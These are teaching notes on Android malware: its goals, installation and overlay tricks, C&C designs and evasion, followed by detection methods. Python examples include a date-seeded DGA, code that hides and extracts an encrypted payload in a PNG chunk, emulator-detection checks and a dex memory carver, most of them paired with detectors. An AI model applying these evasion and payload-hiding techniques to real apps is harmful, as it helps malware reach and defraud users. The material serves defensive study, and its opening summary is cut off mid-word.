This document summarizes information about Android malware, including its goals, installation methods, evasion techniques, and detection methods. Some key points:
- Malware goals include sending premium SMS, stealing banking info, adware click fraud, and ransomware. It can also mine bitcoin or exfiltrate personal data.
- It installs via repackaged apps, update attacks, drive-by downloads, or by misusing accessibility services. Packers encrypt the APK to evade detection.
- Evasion techniques include dynamic C&C domains, encryption, reflection, delaying attacks, and polymorphism/metamorphism. It also checks for emulators or debuggers.
- Detection analy
2. Goal of malware
Send SMS to premium-rate numbers
Bank : steal account info and money
Adware : click fraud
Spyware : Exfiltrate personal info like location, phone info, contact list, etc.
Ransomware
Bitcoin mining
3. Installation methods
1. Repackaging : Download and decompile a popular app, add a malicious payload, re-sign it and upload it to some other “app store” for download.
Variant : upload a benign app to the Play Store, then upload a malicious version of the same app to a third-party “app store”. Both carry the same package name and are signed with the same certificate, so a device that already has the benign app accepts the malicious one as an update (Trend Micro blog).
2. Update attack : Ship only an update component in the app. Download the actual malicious payload at runtime, after the store has reviewed the harmless shell.
3. Drive-by download : Lure the user to the APK via a QR code, SMS link, social-media link, Bluetooth or USB.
4. Malicious install of an APK
1. Root exploit
2. Misuse Android Accessibility services (they can read and drive the UI of other apps, including install prompts)
3. Create confusion through pop-ups and look-alike dialogs
4. Prevent removal by copying the APK to the system partition (needs root)
Grabos (McAfee)
https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-grabos-exposed-millions-to-pay-per-install-scam-on-google-play/
5. PC to mobile infection
Android.Claco : runs on the mobile device. Downloads a Windows executable and places it in the root directory of the SD card. When the device is connected to a PC and the AutoRun feature is enabled, Windows automatically executes the malicious file.
Trojan.Droidpak : runs on Windows as a system service. Downloads a malicious APK and even its own copy of “adb”, then attempts to install the APK on the connected mobile device (works only if USB debugging is on).
6. Loopholes in Google Playstore
Innovation by Android.dvmap
“To bypass Google Play Store security checks, the malware creators used a very interesting method: they uploaded a clean app to the store at the end of March, 2017, and would then update it with a malicious version for short period of time. Usually they would upload a clean version back on Google Play the very same day. They did this at least 5 times between 18 April and 15 May.”
https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/
8. Top permissions asked by Malware
Unless you have a root exploit, you require “Permissions” in the Manifest.
1. INTERNET
2. ACCESS_NETWORK_STATE
3. READ_EXTERNAL_STORAGE / WRITE_EXTERNAL_STORAGE
4. READ_PHONE_STATE
5. ACCESS_WIFI_STATE
6. ACCESS_COARSE_LOCATION / ACCESS_FINE_LOCATION
7. READ_CONTACTS / WRITE_CONTACTS
None of these is rare in benign apps; it is the combination, and the receivers and services declared next to them, that is telling.
9. How to create overlay windows
Bank malware needs to overlay a window which resembles the bank login screen, on top of the real banking app.
Ways to achieve this overlay:
1. Use permission SYSTEM_ALERT_WINDOW (“draw over other apps”).
2. Seek permission to use “Accessibility services”, which gives access to the UI of other running apps and lets the malware create overlays (used by Svpeng).
3. Use a “Toast” notification to create a full-screen window (pre-Oreo). See the “Toast overlay attack” of September 2017.
10. Botnets
Evolution of Command and Control (C&C) architecture
1. First generation had a single C&C server
2. Semi-distributed
3. Peer-to-peer
To avoid hard-coded URLs, the C&C domain is generated with a domain generation algorithm (DGA) seeded by the current date; the operator registers only one of the day’s candidates and the bot walks the list until one resolves. Or the C&C is a Twitter account whose name is generated dynamically (e.g. Twikabot); the bot then decrypts and executes the tweets.
Rapidly rotate the IP address of the C&C server : “fast flux botnet”.
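A worked example, added here and not part of the talk: a toy date-seeded DGA of the kind described above, next to the check a defender runs against it, an NXDOMAIN-burst count over resolver logs (a bot walking a candidate list produces many misses before it hits the one registered name). The algorithm, the secret, the client addresses and the log lines are all constructed for the example; it is not the DGA of any real family.

```python
import hashlib
from collections import defaultdict

# Added example, not from the talk: a toy date-seeded DGA next to the
# defender's usual counter, an NXDOMAIN-burst check over resolver logs.
# The generator is illustrative (it is not the algorithm of any real family)
# and the log lines are constructed, not captured.

TLDS = ("com", "net", "org", "info")


def dga_domains(day_iso, count=8, secret=b"shared-secret"):
    """Bot and operator derive the same candidate list from today's date
    (ISO string, e.g. "2017-11-01") and a secret baked into the binary;
    no C&C name has to be hard-coded in the APK."""
    domains = []
    for i in range(count):
        digest = hashlib.sha256(day_iso.encode() + secret + bytes([i])).digest()
        label = "".join(chr(ord("a") + b % 26) for b in digest[:12])  # 12 lowercase letters
        domains.append(f"{label}.{TLDS[digest[12] % len(TLDS)]}")
    return domains


def nxdomain_bursts(log_lines, threshold=5):
    """Clients that received NXDOMAIN for at least `threshold` distinct names.
    Each line: "<timestamp> <client_ip> <qname> <rcode>"."""
    misses = defaultdict(set)
    for line in log_lines:
        _ts, client, qname, rcode = line.split()
        if rcode == "NXDOMAIN":
            misses[client].add(qname.lower().rstrip("."))
    return sorted(c for c, names in misses.items() if len(names) >= threshold)


def build_sample_log(day_iso):
    """Constructed resolver log: one bot walking the day's list (only the last
    name resolves, because that is the one the operator registered) and one
    normal client with a single typo."""
    bot, normal = "10.0.0.23", "10.0.0.7"
    names = dga_domains(day_iso)
    lines = [f"{day_iso}T09:00:{i:02d} {bot} {name}. {'NOERROR' if i == len(names) - 1 else 'NXDOMAIN'}"
             for i, name in enumerate(names)]
    lines += [f"{day_iso}T09:01:00 {normal} play.google.com. NOERROR",
              f"{day_iso}T09:01:05 {normal} typo-exmaple.com. NXDOMAIN"]
    return lines


if __name__ == "__main__":
    print(dga_domains("2017-11-01"))
    print("suspect clients:", nxdomain_bursts(build_sample_log("2017-11-01")))
```

The threshold is the tuning knob: real clients also produce NXDOMAINs (typos, stale CDN names), so in practice it is set per time window and combined with the lexical oddness of the names.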
11. Evade detection by anti-malware tools
1. All constant strings in the APK are encrypted
2. Use of Base64 encoding
3. Network traffic is encrypted
4. Call via reflection; decrypt class and method names just before the call
5. Decryption key is not hard-coded but derived at runtime
6. Hide the payload inside the images folder
7. Use Android packers or protectors
8. Alter behaviour when running inside an emulator
9. Modify the code at runtime to evade static signatures (metamorphic malware)
12. Hide the payload inside an image
A PNG file is a sequence of chunks, each with a length, a 4-byte type and a CRC.
If a chunk has an unknown (ancillary) type, the PNG reader skips it.
So a PNG holding a legitimate image (e.g. the app icon) can also carry the (encrypted) malware.
At runtime, load the payload from the chunk, decrypt it, write it out and run it using DexClassLoader.
Anomaly : look for a small image with a large file size!
Axelle Apvrille. Hide Android Applications in Images. Blackhat Europe 2014
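The PNG trick, as an added example (not code from the talk or from the Blackhat paper): it builds a valid 16x16 PNG with an extra ancillary chunk that carries a payload, then scans the chunk list the way a detector would: CRC check, non-standard chunk types, bytes per pixel. The chunk name stEg, the XOR key and the payload bytes are made up for the example; a real sample would use proper encryption and a real classes.dex.

```python
import struct
import zlib

# Added example, not from the talk or the Blackhat paper: build a valid PNG
# that carries an extra chunk, then walk the chunk list the way a scanner
# would: check each CRC, flag chunk types a decoder would silently skip, and
# compare file size with pixel count. The chunk name "stEg", the XOR "cipher"
# and the payload are illustrative.

PNG_SIG = b"\x89PNG\r\n\x1a\n"
STANDARD_CHUNKS = {b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tRNS", b"cHRM", b"gAMA",
                   b"iCCP", b"sBIT", b"sRGB", b"tEXt", b"zTXt", b"iTXt", b"bKGD",
                   b"hIST", b"pHYs", b"sPLT", b"tIME"}


def chunk(ctype, data):
    """length + type + data + CRC32(type + data), as the PNG spec requires."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_png(width, height, extra_chunks=()):
    """8-bit greyscale, all-black image; extra chunks go between IHDR and IDAT."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    raw = b"".join(b"\x00" + b"\x00" * width for _ in range(height))  # filter byte + row
    out = PNG_SIG + chunk(b"IHDR", ihdr)
    for ctype, data in extra_chunks:
        out += chunk(ctype, data)
    return out + chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b"")


def iter_chunks(blob):
    if blob[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos = 8
    while pos + 12 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        data = blob[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", blob[pos + 8 + length:pos + 12 + length])
        yield ctype, data, crc == (zlib.crc32(ctype + data) & 0xFFFFFFFF)
        pos += 12 + length


def xor(data, key):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def scan_png(blob):
    """Return (width, height, bytes_per_pixel, suspicious) where suspicious lists
    (type, size, crc_ok, ancillary) for non-standard chunks. A lowercase first
    letter marks the chunk ancillary, i.e. one decoders are allowed to ignore."""
    width = height = 0
    suspicious = []
    for ctype, data, ok in iter_chunks(blob):
        if ctype == b"IHDR":
            width, height = struct.unpack(">II", data[:8])
        elif ctype not in STANDARD_CHUNKS:
            suspicious.append((ctype, len(data), ok, bool(ctype[0] & 0x20)))
    return width, height, len(blob) / max(width * height, 1), suspicious


def extract_payload(blob, ctype, key):
    """What the dropper does at run time: pull the chunk, decrypt, hand to DexClassLoader."""
    for t, data, ok in iter_chunks(blob):
        if t == ctype and ok:
            return xor(data, key)
    return None


KEY = b"\x5a\xa5\x0f"
PAYLOAD = b"dex\n035\x00" + bytes(range(256)) * 4      # stand-in for a classes.dex
ICON_WITH_PAYLOAD = build_png(16, 16, [(b"stEg", xor(PAYLOAD, KEY))])   # constructed sample
CLEAN_ICON = build_png(16, 16)

if __name__ == "__main__":
    print(scan_png(ICON_WITH_PAYLOAD))
    print(extract_payload(ICON_WITH_PAYLOAD, b"stEg", KEY)[:8])
```

Both the clean icon and the loaded one decode to the same picture; only the chunk walk and the size-per-pixel ratio tell them apart, which is the anomaly the slide points at.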
13. Packers and Protectors
Top packers : Bangcle, APKProtect.com, Baidu, Tencent
● Encrypt the original dex (or whole APK) and store it in the assets folder
● Replace the app’s main Activity/Application entry point with their own stub
● Insert their own decryption library (native C)
● At run time, decrypt the original code in RAM and load it
Packers were developed to protect vendor IP, but are being misused to distribute malware.
Static analysis of a packed APK sees only the stub and an encrypted blob; the real code exists only in memory at run time, which is why unpacking (slide 32) is done from the running process.
16. Emulator evasion techniques-1
Device ID, phone number, IMEI and IMSI have fixed, fake values on the stock emulator
● TelephonyManager.getDeviceId().equals(“00000…”)
● TelephonyManager.getSimCountryIso().equals(“Android”)
● TelephonyManager.getSimOperatorName().equals(“Android”)
● TelephonyManager.getLine1Number().equals(“15555215554”)
where 1555521 is a fixed prefix and 5554 is the emulator’s console port (the second instance gets 5556, and so on).
https://news.sophos.com/en-us/2017/04/13/android-malware-anti-emulation-techniques/
17. Emulator evasion techniques-2
Inside the emulator, the build info is set to fake values
● Build.MODEL contains “google_sdk”, “Emulator” or “Android SDK”
● Build.FINGERPRINT starts with “generic” or “unknown”
● Build.MANUFACTURER contains “Genymotion”
● Build.BRAND starts with “generic”
● Build.DEVICE starts with “generic”
18. Emulator evasion techniques-3
Emulator properties give it away
1. System properties “ro.bootloader”, “ro.bootmode”, “ro.hardware”, “ro.product.model”, etc. are set to “unknown”, “generic”, “sdk”, etc.
2. Emulator-related files exist : “/dev/socket/qemud”, “/system/lib/libc_malloc_debug_qemu.so”, “/sys/qemu_trace”, “/system/bin/qemu-props”.
3. getInstallerPackageName() is not “com.android.vending” (it is null for an app side-loaded with “adb install”, i.e. the app did not come from the Play Store).
4. Check if the user’s account email address contains “google”, “tester”, etc.
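The checks of slides 16 to 18 turned around for the analyst, as an added example (not from the talk): paste in the output of adb shell getprop, plus the list of qemu artefact files you found present, and it lists the tells a sample would trip over, i.e. what to change before running malware in the emulator. The two property dumps are constructed; the Build.* fields of slide 17 are backed by the ro.* properties named in the code.

```python
import re

# Added example, not from the talk: the checks of slides 16-18 turned around
# for the analyst. Feed it the output of `adb shell getprop` (and, optionally,
# the emulator artefact files you found present) and it lists which tells a
# sample would trip over. Both property dumps below are constructed.

PROP_LINE = re.compile(r"^\[(?P<key>[^\]]+)\]: \[(?P<val>[^\]]*)\]$")


def parse_getprop(text):
    """getprop prints one '[key]: [value]' per line."""
    props = {}
    for line in text.splitlines():
        m = PROP_LINE.match(line.strip())
        if m:
            props[m.group("key")] = m.group("val")
    return props


# (system property behind the Build.* field, predicate, what the malware concludes)
CHECKS = [
    ("ro.product.model", lambda v: any(s in v for s in ("google_sdk", "Emulator", "Android SDK")),
     "Build.MODEL names the SDK"),
    ("ro.build.fingerprint", lambda v: v.startswith(("generic", "unknown")),
     "Build.FINGERPRINT starts with generic/unknown"),
    ("ro.product.manufacturer", lambda v: "Genymotion" in v, "Build.MANUFACTURER is Genymotion"),
    ("ro.product.brand", lambda v: v.startswith("generic"), "Build.BRAND starts with generic"),
    ("ro.product.device", lambda v: v.startswith("generic"), "Build.DEVICE starts with generic"),
    ("ro.bootloader", lambda v: v.lower() == "unknown", "ro.bootloader is unknown"),
    ("ro.bootmode", lambda v: v.lower() == "unknown", "ro.bootmode is unknown"),
    ("ro.hardware", lambda v: v.lower() in ("unknown", "generic", "sdk", "goldfish", "ranchu"),
     "ro.hardware is an emulator board"),
    ("ro.kernel.qemu", lambda v: v == "1", "ro.kernel.qemu is set"),
]

QEMU_FILES = {"/dev/socket/qemud", "/system/lib/libc_malloc_debug_qemu.so",
              "/sys/qemu_trace", "/system/bin/qemu-props"}


def emulator_tells(props, present_files=()):
    """Every indicator from slides 17-18 that fires on this device."""
    hits = [why for key, pred, why in CHECKS if key in props and pred(props[key])]
    hits += [f"emulator file present: {f}" for f in sorted(QEMU_FILES & set(present_files))]
    return hits


# Constructed getprop dumps: a stock AVD and a retail phone.
EMULATOR_PROPS = """
[ro.product.model]: [Android SDK built for x86]
[ro.build.fingerprint]: [generic/sdk_phone_x86/generic_x86:7.1.1/NYC/1:userdebug/test-keys]
[ro.product.brand]: [generic]
[ro.product.device]: [generic_x86]
[ro.product.manufacturer]: [unknown]
[ro.bootloader]: [unknown]
[ro.bootmode]: [unknown]
[ro.hardware]: [ranchu]
[ro.kernel.qemu]: [1]
"""
PHONE_PROPS = """
[ro.product.model]: [Pixel 2]
[ro.build.fingerprint]: [google/walleye/walleye:8.1.0/OPM1/1:user/release-keys]
[ro.product.brand]: [google]
[ro.product.device]: [walleye]
[ro.product.manufacturer]: [Google]
[ro.bootloader]: [b1.2.3]
[ro.bootmode]: [normal]
[ro.hardware]: [walleye]
"""

if __name__ == "__main__":
    for why in emulator_tells(parse_getprop(EMULATOR_PROPS), ["/dev/socket/qemud", "/system/bin/qemu-props"]):
        print("FIX:", why)
```

Properties on the stock emulator are read-only at run time; the usual fix is a modified build.prop in a custom system image, or a device image whose values already look like retail hardware.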
19. Detect if running in debugger
Check Debug.isDebuggerConnected() and Debug.waitingForDebugger().
Launch a second thread or child process and let it ptrace()-attach to the main process: a process can have only one tracer, so an analyst’s debugger can no longer attach.
[PackerGrind paper]
20. Delay the attack
Delay the attack by a fixed time (e.g. 24 hours), long enough to outlast sandbox testing.
Launch the malware only when Google Play is launched, by adding the category “android.intent.category.APP_MARKET” to the application’s main intent filter (done by Tascudap).
21. Polymorphic and metamorphic malware
Oligomorphic : a small, fixed set of decryptor variants; the encrypted body changes but the decryptors can still be signatured.
Polymorphic
● Use of encryption for strings and payloads; data append/prepend
Metamorphic (hard to detect using file signatures)
1. Reorder instructions or data structures
2. Add semantic NOPs
3. Register reassignment
https://reverseengineering.stackexchange.com/questions/1696/what-are-the-differences-between-metamorphic-oligomorphic-and-polymorphic-malwa
25. Static analysis
Check
● uses-feature entries in the Manifest
● Permissions in the Manifest
● Intents and intent filters (exported components)
● Use of DexClassLoader and of native libraries (System.loadLibrary / NDK)
● Use of crypto APIs
● OS system calls (in native code)
● Broadcast receivers (which system events wake the app up)
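A static check covering the manifest items above and the permission and overlay slides (8 and 9), added as an example and not taken from the talk: it parses a decoded AndroidManifest.xml (as apktool produces it), scores the permissions, and flags the overlay, accessibility-service, SMS and device-admin declarations. The sample manifest and the scoring weights are invented for the example.

```python
import xml.etree.ElementTree as ET

# Added example, not from the talk: the manifest checks of slides 8, 9 and 25
# as a script. It takes a decoded AndroidManifest.xml (apktool output), scores
# the permissions slide 8 lists, and flags the overlay/accessibility/SMS
# combinations from slide 9. The manifest below is constructed; the weights
# are illustrative, not a published scoring.

ANDROID = "{http://schemas.android.com/apk/res/android}"

COMMON_PERMS = {  # slide 8: requested by most malware, but by most benign apps too
    "android.permission.INTERNET": 1,
    "android.permission.ACCESS_NETWORK_STATE": 1,
    "android.permission.READ_EXTERNAL_STORAGE": 1,
    "android.permission.WRITE_EXTERNAL_STORAGE": 1,
    "android.permission.READ_PHONE_STATE": 2,
    "android.permission.ACCESS_WIFI_STATE": 1,
    "android.permission.ACCESS_COARSE_LOCATION": 2,
    "android.permission.ACCESS_FINE_LOCATION": 2,
    "android.permission.READ_CONTACTS": 2,
    "android.permission.WRITE_CONTACTS": 2,
}
DANGEROUS_PERMS = {  # the ones behind premium SMS, overlays and removal hardening
    "android.permission.SEND_SMS": 4,
    "android.permission.RECEIVE_SMS": 4,
    "android.permission.SYSTEM_ALERT_WINDOW": 4,
    "android.permission.BIND_DEVICE_ADMIN": 3,
}
ACCESSIBILITY = "android.permission.BIND_ACCESSIBILITY_SERVICE"


def analyze_manifest(xml_text):
    root = ET.fromstring(xml_text)
    perms = {e.get(ANDROID + "name") for e in root.iter("uses-permission")}
    features = sorted(e.get(ANDROID + "name") for e in root.iter("uses-feature"))
    # An accessibility service is a <service> protected by BIND_ACCESSIBILITY_SERVICE
    a11y = [s.get(ANDROID + "name") for s in root.iter("service")
            if s.get(ANDROID + "permission") == ACCESSIBILITY]
    receiver_actions = sorted({a.get(ANDROID + "name")
                               for r in root.iter("receiver") for a in r.iter("action")})

    score = sum(COMMON_PERMS.get(p, 0) + DANGEROUS_PERMS.get(p, 0) for p in perms) + 4 * len(a11y)
    findings = []
    if "android.permission.SYSTEM_ALERT_WINDOW" in perms:
        findings.append("can draw over other apps (overlay)")
    if a11y:
        findings.append("declares accessibility service: " + ", ".join(a11y))
    if "android.provider.Telephony.SMS_RECEIVED" in receiver_actions and "android.permission.RECEIVE_SMS" in perms:
        findings.append("receives incoming SMS (OTP interception)")
    if "android.permission.SEND_SMS" in perms:
        findings.append("can send SMS (premium-rate fraud)")
    if "android.app.action.DEVICE_ADMIN_ENABLED" in receiver_actions:
        findings.append("device-admin receiver (harder to uninstall)")
    return {"score": score, "permissions": sorted(perms), "features": features,
            "receiver_actions": receiver_actions, "findings": findings}


# Constructed manifest of a "flashlight" app with a banker's declarations.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.flashlight">
  <uses-feature android:name="android.hardware.telephony"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <application android:label="Flashlight">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <service android:name=".A11y" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter><action android:name="android.accessibilityservice.AccessibilityService"/></intent-filter>
    </service>
    <receiver android:name=".SmsRx">
      <intent-filter android:priority="999"><action android:name="android.provider.Telephony.SMS_RECEIVED"/></intent-filter>
    </receiver>
    <receiver android:name=".Admin" android:permission="android.permission.BIND_DEVICE_ADMIN">
      <intent-filter><action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/></intent-filter>
    </receiver>
  </application>
</manifest>"""

if __name__ == "__main__":
    for k, v in analyze_manifest(SAMPLE_MANIFEST).items():
        print(k, v)
```

Run it on the manifest apktool writes out, not on the binary AXML inside the APK; the score is a triage aid, and the findings list is what goes into the report.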
26. Dynamic Analysis
Run APK in Sandbox - e.g. DroidBox, Andrubis
Record
1. API calls
2. OS system calls
3. Network traffic
4. Battery consumption
5. CPU usage
27. Network monitoring
Malware tends to use DNS, HTTP (OkHttp), IRC and Tor.
1. DNS queries may be used to locate the C&C server (see the DGA on slide 10).
2. Why OkHttp? It can contact multiple alternative HTTP servers, and retries silently and periodically in case of failure.
3. IRC is popular because it supports redundancy (multi-master), has a built-in login protocol, and offers full two-way communication.
4. Tor : difficult to shut down a botnet using Tor, as you cannot de-anonymize a C&C server sitting inside the Tor network as a hidden service.
5. An app may not request the INTERNET permission at all, but use other apps (e.g. the browser, via an intent) to send and receive data.
28. Dynamic Analysis - Andrubis
Andrubis does “stimulation” instead of passive waiting or UI exploration:
1. Invoke all Activities (not just Main) found in the Manifest
2. Patch the Android ActivityManager to start all background services automatically
3. Intercept calls to “registerReceiver” and use the ActivityManager to invoke the registered receivers
4. Broadcast common events such as SMS, WiFi+3G connectivity, GPS lock, phone calls and phone-state changes to trigger OS and app behaviour
Andrubis is now commercial (Lastline).
[Weichselbaum, et al. Andrubis: Android Malware under the magnifying glass]
29. TaintDroid
Leverages Android’s virtualized environment. Assumes no app is trusted.
It labels (taints) data from privacy-sensitive sources and transitively applies the labels as sensitive data propagates through program variables, files, and interprocess messages.
When tainted data are transmitted over the network, or otherwise leave the system, TaintDroid logs the data’s labels, the application responsible for transmitting the data, and the data’s destination.
[Enck, et al. TaintDroid - OSDI 2010]
31. Beat the malware’s emulator detection
Make the emulator look like a real device
● Set a geo-location : “adb emu geo fix <longitude> <latitude> <altitude>”
● Change the hard-coded IMEI and IMSI in the emulator binary
● Use an emulator console port other than the defaults 5554 to 5584 (the port leaks through the phone number, see slide 16)
● Use “genymotion”, which apparently has addressed all these issues
Axelle Apvrille. Android malware reverse engineering
32. How to beat the Packers
Some packers decrypt the original dex at known locations in RAM. Use that to find and dump the decrypted code from the running process.
[ Strazzere, DEF CON 22 (2014) https://github.com/strazzere/android-unpacker ]
DexHunter modifies the runtime (Dalvik and ART/OAT) to trap class loading and dump the dex as it is loaded.
[ Zhang, et al. DexHunter. ESORICS 2015 https://github.com/zyq8709/DexHunter ]
PackerGrind
[ Xue, et al. Adaptive Unpacking of Android Apps ]
DaBID Debugger [Blackhat Asia 2015]
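The memory-dump approach in its simplest form, as an added example (not the code of any of the tools cited above): scan a dump of the process for the dex header magic, validate the header fields and the Adler-32 checksum the header carries, and report what can be carved. The memory image is constructed inside the code; on a real device it would be read from /proc/<pid>/mem after the packer’s stub has decrypted its payload.

```python
import hashlib
import re
import struct
import zlib

# Added example, not from the talk or from any of the tools it cites: the
# simplest form of "find the decrypted dex in RAM". It scans a process memory
# dump for the dex header magic, validates header_size and the endian tag,
# checks the Adler-32 the header carries, and reports offset and size for
# carving. The dump is constructed; a real one comes from /proc/<pid>/mem.

HEADER_SIZE = 0x70
ENDIAN_CONSTANT = 0x12345678
DEX_MAGIC_RE = re.compile(rb"dex\n03[5-9]\x00")   # "dex\n035\0" .. "dex\n039\0"


def build_fake_dex(body_size=300):
    """A header-only dex with correct file_size, signature and checksum
    (the body is filler, not real dex tables)."""
    hdr = bytearray(HEADER_SIZE)
    hdr[0:8] = b"dex\n035\x00"
    # file_size @0x20, header_size @0x24, endian_tag @0x28
    struct.pack_into("<III", hdr, 0x20, HEADER_SIZE + body_size, HEADER_SIZE, ENDIAN_CONSTANT)
    data = bytes(hdr) + bytes((i * 7) & 0xFF for i in range(body_size))
    sig = hashlib.sha1(data[32:]).digest()            # signature covers everything after itself
    data = data[:12] + sig + data[32:]
    checksum = zlib.adler32(data[12:]) & 0xFFFFFFFF   # checksum covers everything after itself
    return data[:8] + struct.pack("<I", checksum) + data[12:]


def carve_dex(dump):
    """Return [(offset, file_size, checksum_ok)] for every plausible dex in the dump."""
    found = []
    for m in DEX_MAGIC_RE.finditer(dump):
        off = m.start()
        if off + HEADER_SIZE > len(dump):
            continue
        file_size, header_size, endian = struct.unpack_from("<III", dump, off + 0x20)
        if header_size != HEADER_SIZE or endian != ENDIAN_CONSTANT or off + file_size > len(dump):
            continue                                   # magic without a sane header: a string, not a dex
        cand = dump[off:off + file_size]
        (stored,) = struct.unpack_from("<I", cand, 8)
        found.append((off, file_size, (zlib.adler32(cand[12:]) & 0xFFFFFFFF) == stored))
    return found


def build_sample_dump():
    """Constructed memory image: filler, a good dex, the magic as a bare string
    (as it sits in the unpacker stub), and a dex with one flipped byte."""
    good = build_fake_dex()
    damaged = bytearray(good)
    damaged[-1] ^= 0xFF
    return bytes(range(100)) + good + b"\x00" * 50 + b"dex\n035\x00" + b"\x00" * 0x70 + bytes(damaged)


if __name__ == "__main__":
    for off, size, ok in carve_dex(build_sample_dump()):
        print(f"dex at {off:#x}, {size} bytes, checksum {'ok' if ok else 'BAD'}")
```

A failed checksum is not necessarily noise: some packers deliberately corrupt the header after loading so that a naive dump does not load in a disassembler, and the tools cited above exist because of exactly that.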
33. Opcode analysis
Classify apps according to n-grams of opcodes in the APK.
Dalvik has 218 unique opcodes.
Split the opcode stream at class/method boundaries before creating n-grams, so that no n-gram spans two methods.
Strip the operands (registers, constants, method references); keep only the opcode mnemonic.
A 1-gram is just a histogram of opcode frequencies.
This method survives identifier renaming and string encryption, because those obfuscations do not change the opcode sequence!
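The n-gram extraction, added as an example (not the talk’s code): it takes smali text as baksmali produces it, keeps only opcode mnemonics, never lets an n-gram span two methods, and compares a renamed copy of a premium-SMS method against the original and against a benign method using cosine similarity. The three smali snippets are constructed.

```python
import math
from collections import Counter

# Added example, not from the talk: opcode n-gram profiles over smali
# (baksmali output), with the two details the slide insists on: operands are
# stripped and n-grams never cross a method boundary. The snippets are
# constructed; RENAMED is the premium-SMS method with identifiers and strings
# renamed, to show the profile does not move.


def method_opcode_sequences(smali_text):
    """One list of mnemonics per .method block; directives, labels and operands dropped."""
    methods, current = [], None
    for raw in smali_text.splitlines():
        line = raw.strip()
        if line.startswith(".method"):
            current = []
        elif line.startswith(".end method"):
            methods.append(current)
            current = None
        elif current is not None and line and not line.startswith((".", ":", "#")):
            current.append(line.split()[0])   # keep "invoke-virtual", drop "{v1 .. v6}, L...;->..."
    return methods


def ngram_profile(methods, n):
    """Relative frequency of each n-gram, counted within methods only."""
    counts = Counter()
    for seq in methods:
        counts.update(tuple(seq[i:i + n]) for i in range(len(seq) - n + 1))
    total = sum(counts.values()) or 1
    return {g: c / total for g, c in counts.items()}


def cosine(p, q):
    dot = sum(p[g] * q.get(g, 0.0) for g in p)
    norm = math.sqrt(sum(v * v for v in p.values())) * math.sqrt(sum(v * v for v in q.values()))
    return dot / norm if norm else 0.0


PREMIUM_SMS = """
.method private sendPremium()V
    .locals 6
    const-string v0, "3454"
    const-string v1, "TXT subscribe"
    invoke-static {}, Landroid/telephony/SmsManager;->getDefault()Landroid/telephony/SmsManager;
    move-result-object v2
    const/4 v3, 0x0
    move-object v4, v3
    move-object v5, v3
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    return-void
.end method
"""
RENAMED = PREMIUM_SMS.replace("sendPremium", "a").replace("3454", "x").replace("TXT subscribe", "y")
BENIGN = """
.method private sum(I)I
    .locals 3
    const/4 v0, 0x0
    const/4 v1, 0x0
    :loop
    if-ge v1, p1, :done
    add-int/2addr v0, v1
    add-int/lit8 v1, v1, 0x1
    goto :loop
    :done
    return v0
.end method
"""

if __name__ == "__main__":
    known_bad = ngram_profile(method_opcode_sequences(PREMIUM_SMS), 2)
    for name, text in (("renamed", RENAMED), ("benign", BENIGN)):
        print(name, round(cosine(ngram_profile(method_opcode_sequences(text), 2), known_bad), 3))
```

In a real pipeline the profiles come from thousands of APKs per class and the similarity is replaced by a trained classifier over the n-gram vectors; the extraction step is the part that stays the same.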
34. ML model over opcode sequences
ML : the holy grail!
Treat the opcode sequence as text and formulate malware recognition as an NLP problem.
Feed the opcode sequence to a neural net (a convolutional network), which learns for itself which n-gram lengths are most relevant instead of fixing n in advance.
[ McLaughlin et al. Deep Android Malware Detection. CODASPY 2017 ]
35. ML model over API or OS calls
These require first running the app in an emulator to capture dynamic behaviour.
Malware may not exhibit all its malicious behaviour during the test (see slides 16 to 20 on emulator detection and delayed attacks).
36. Baidu Appstore
Baidu has ACS, the equivalent of Google’s Bouncer.
They offer an APK Protector (http://apkprotect.baidu.com)
Evolution of their anti-malware strategy
1. Signature-based rules
2. Behaviour-based rules
3. Opcode-based rules
4. As of 2016 : deep learning model called “AlphaAv”
Thomas Wang (Baidu). AI Based Antivirus. Blackhat 2016
37. Baidu Appstore
AlphaAv ML model extracts features from the APK
1. Permissions in the Manifest
2. Number of picture files in /res
3. Number of fields of type “boolean”
4. Number of methods with more than 20 parameters
5. Has an executable file in /res?
6. Has an APK file in /assets?
7. Registers for the DEVICE_ADMIN_ENABLED broadcast and has the SEND_SMS permission
38. Google Playstore
Components
1. Bouncer : tests submitted apps in Google Cloud
2. Verify Apps : runs on the device. Warns about or blocks installation of harmful apps; continuously scans apps running on the device; kills (removes) malware apps remotely.
3. SafetyNet : privacy-preserving IDS
4. SafetyNet Attestation : determines if the device is CTS compatible
5. Android Device Manager : locates a stolen or lost device
6. Android Update service : delivers updates to the device through the web or OTA
39. Google Playstore
Vertical monitoring : does the runtime behaviour of an app differ from its upload-time (testing) behaviour?
Lateral monitoring : how does the same app behave across all the devices? A device that stops performing the periodic “Verify Apps” check after an app install is flagged as DOI (Dead or Insecure).
From this the “Verify Apps” service computes a DOI score for each app (how many of the devices that installed it went DOI). All apps should have DOI scores in the same range; an outlier is suspicious.
